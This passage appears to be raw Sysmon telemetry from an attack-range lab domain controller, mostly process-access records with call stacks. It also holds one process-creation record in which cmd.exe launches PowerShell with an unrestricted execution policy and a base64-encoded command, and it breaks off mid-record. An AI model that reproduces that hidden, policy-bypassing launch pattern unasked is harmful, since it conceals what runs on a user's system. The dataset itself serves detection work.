08:40:23.602{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000094Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.602{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 11241100x800000000000000093Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.555{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_gdq1umrn.j3j.ps12020-10-12 08:40:23.555 10341000x800000000000000092Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.540{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000091Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000090Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000089Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000088Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000087Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000086Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000085Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000084Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000083Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000082Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000081Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x800000000000000080Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.524{5D479F2C-1677-5F84-F802-000000007E01}51124340C:\Windows\system32\cmd.exe{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x800000000000000079Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.518{5D479F2C-1677-5F84-F902-000000007E01}4384C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-1677-5F84-F802-000000007E01}5112C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x800000000000000078Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.508{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000077Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 